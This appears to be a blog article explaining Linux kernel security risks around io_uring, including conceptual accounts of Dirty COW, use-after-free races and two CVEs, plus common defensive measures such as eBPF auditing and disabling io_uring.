Linux Kernel: How to Monitor and Secure Io

While Linux has amazing security features, it is not a stranger to security loopholes that have had security teams running helter-skelter as they try to figure out what to do. Dirty COW is one such example of a vulnerability that existed in the kernel codebase for a good nine years before users discovered it. The premise here was that when two programs wanted to read the same data, the kernel would point them to a shared copy, but when one program tried to modify that data, the kernel would duplicate it into a private copy. Attackers realized that they could exploit a loophole that opened up during the duplication by tricking the kernel into writing their changes directly into the original read-only file rather than the private copy, thus allowing them to overwrite system files and gain root administrator privileges. It’s safe to say that this discovery kept many security teams awake.

Even now that Linux has come a long way since then, it still faces key security challenges that security teams must be privy to if they are to take charge of these systems. We look at how this plays out in the modern day within the context of system calls, io_uring, and async kernel interfaces.

The Role of io_uring in System Calls

Operating systems have two parts. These are the user space where applications run and the kernel space where the core operating system manages hardware and physical memory. Thanks to this setup, applications are not able to communicate with hardware directly and must instead trigger system calls in order to read files or send data over a network.

Traditionally, every time an application made this system call, the application would pause so that the kernel could take over to perform the requested hardware operation before giving back power to the application once the operation was complete. As such, the communication was synchronous. But while this ensured effective communication between both the user and kernel spaces, it also introduced the challenge of slowed performance. After all, if an app was making multiple requests, the time taken to switch back and forth would eat into the processing time.

io_uring was thus introduced to fix this issue by allowing asynchronous operations to take place. In this way, there were two shared memory buffers between the kernel and applications. One was the submission queue, where apps could drop their requests, and the other was the completion queue, where kernels could drop the completed results. But while this change sped things up, it introduced a security loophole.

How Attackers Use io_uring to Their Advantage

With io_uring, both the kernel and the application read and write to the same memory space at the same time. Thus, if the kernel fails to manage this data effectively, bugs can occur. How?

Well, it all comes down to the timing. The most common security risk is the Use-After-Free (UAF) attack. Here, attackers submit requests to the kernel, and while it is processing this in the background, they trigger another process to free up that memory. Since the kernel is unaware of the change, it continues processing the required task in the background and proceeds to read or write to a memory slot that now has different data.

In addition to this, attackers are also able to bypass traditional security tools because io_uring allows apps to drop data into the shared memory buffers without triggering system calls for every action.

Are Security Teams Being Proactive?

Over the years, there have been several security challenges brought on by io_uring. Take CVE-2021-3491, for example. Thanks to a flaw in how io_uring validated the size of user-provided data, attackers were able to write data beyond the buffer limits and alter the kernel memory. CVE-2023-21400 was just as bad as it allowed attackers to exploit the flaws in the kernel’s locking mechanisms, thus freeing up memory to the point of getting root access.

So, how are security teams remaining vigilant?

Different teams have adopted approaches best suited to their organizational needs. Most of them have turned to kernel-level auditing, where they rely on technologies like eBPF to monitor programs directly inside the kernel that can bypass the traditional security tools. A good number have also disabled io_uring, which works well in organizations whose servers do not run high-performance databases that would require asynchronous communication.

In addition, some security teams have been blocking containers from using io_uring features, thus ensuring that if an attacker compromises their apps, they cannot use them to interact with the interface.

Is io_uring Safe? About Linux Kernel’s Biggest Security Surface

The Role of io_uring in System Calls

How Attackers Use io_uring to Their Advantage

Are Security Teams Being Proactive?